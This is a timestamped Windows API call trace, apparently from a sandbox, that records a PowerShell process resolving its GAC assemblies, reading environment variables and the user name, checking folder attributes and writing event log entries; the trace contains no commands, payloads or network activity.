	[0305.998] CoTaskMemFree (pv=0x3a6ee0) 
	[0305.999] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0305.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.999] CoTaskMemFree (pv=0x3a6ee0) 
	[0306.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0306.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0306.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0306.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0306.032] CoTaskMemAlloc (cb=0x804) returned 0x1b7a5080
	[0306.032] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a5080, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0306.938] CoTaskMemFree (pv=0x1b7a5080) 
	[0306.938] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0306.938] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0306.938] CoTaskMemFree (pv=0x35b1e0) 
	[0306.938] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbc628*="Certificate", lpRawData=0x2dbc3b8) returned 1
	[0307.754] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0307.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.754] CoTaskMemFree (pv=0x3a6ee0) 
	[0307.757] GetLogicalDrives () returned 0x4
	[0307.757] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0307.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0307.758] CoTaskMemAlloc (cb=0x20e) returned 0x3a3d20
	[0307.758] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3a3d20 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0307.758] CoTaskMemFree (pv=0x3a3d20) 
	[0307.759] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0307.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.760] CoTaskMemFree (pv=0x3a6ee0) 
	[0307.760] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0307.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.760] CoTaskMemFree (pv=0x3a6ee0) 
	[0307.773] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0307.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.773] CoTaskMemFree (pv=0x3a6ee0) 
	[0307.774] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0307.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.774] CoTaskMemFree (pv=0x3a6ee0) 
	[0307.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.775] SetErrorMode (uMode=0x1) returned 0x1
	[0307.775] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0307.775] SetErrorMode (uMode=0x1) returned 0x1
	[0307.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.775] SetErrorMode (uMode=0x1) returned 0x1
	[0307.775] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0307.775] SetErrorMode (uMode=0x1) returned 0x1
	[0307.776] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0307.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.776] CoTaskMemFree (pv=0x3a6ee0) 
	[0307.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.780] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0307.780] SetErrorMode (uMode=0x1) returned 0x1
	[0307.780] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cf70 | out: lpFileInformation=0x12cf70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0307.780] SetErrorMode (uMode=0x1) returned 0x1
	[0307.780] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0307.781] SetErrorMode (uMode=0x1) returned 0x1
	[0307.781] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cf70 | out: lpFileInformation=0x12cf70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0307.781] SetErrorMode (uMode=0x1) returned 0x1
	[0307.781] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0307.781] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0307.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.781] SetErrorMode (uMode=0x1) returned 0x1
	[0307.781] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cf70 | out: lpFileInformation=0x12cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0307.781] SetErrorMode (uMode=0x1) returned 0x1
	[0307.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.781] SetErrorMode (uMode=0x1) returned 0x1
	[0307.781] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cf70 | out: lpFileInformation=0x12cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0307.782] SetErrorMode (uMode=0x1) returned 0x1
	[0307.782] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.782] SetErrorMode (uMode=0x1) returned 0x1
	[0307.782] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cf70 | out: lpFileInformation=0x12cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0307.782] SetErrorMode (uMode=0x1) returned 0x1
	[0307.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.782] SetErrorMode (uMode=0x1) returned 0x1
	[0307.782] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cf70 | out: lpFileInformation=0x12cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0307.782] SetErrorMode (uMode=0x1) returned 0x1
	[0307.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.783] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.783] SetErrorMode (uMode=0x1) returned 0x1
	[0307.783] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0307.783] SetErrorMode (uMode=0x1) returned 0x1
	[0307.783] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.783] SetErrorMode (uMode=0x1) returned 0x1
	[0307.784] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0307.784] SetErrorMode (uMode=0x1) returned 0x1
	[0307.784] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0307.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.784] SetErrorMode (uMode=0x1) returned 0x1
	[0307.784] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0307.784] SetErrorMode (uMode=0x1) returned 0x1
	[0307.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.784] SetErrorMode (uMode=0x1) returned 0x1
	[0307.784] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0307.784] SetErrorMode (uMode=0x1) returned 0x1
	[0307.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0307.786] SetErrorMode (uMode=0x1) returned 0x1
	[0307.786] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d270 | out: lpFileInformation=0x12d270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0307.786] SetErrorMode (uMode=0x1) returned 0x1
	[0307.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.526] CoTaskMemAlloc (cb=0x804) returned 0x1b7a5080
	[0308.526] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a5080, nSize=0x12d5d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d5d8) returned 0x1
	[0308.527] CoTaskMemFree (pv=0x1b7a5080) 
	[0308.527] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0308.527] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d618 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d618) returned 1
	[0308.527] CoTaskMemFree (pv=0x35b1e0) 
	[0308.528] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df5310*="Available", lpRawData=0x2df50a0) returned 1
	[0309.107] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0309.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.107] CoTaskMemFree (pv=0x3a6ee0) 
	[0309.108] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0309.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.108] CoTaskMemFree (pv=0x3a6ee0) 
	[0309.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.110] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0309.111] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0309.111] CoTaskMemFree (pv=0x3a6ee0) 
	[0309.111] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0309.111] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0309.111] CoTaskMemFree (pv=0x3a6ee0) 
	[0309.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
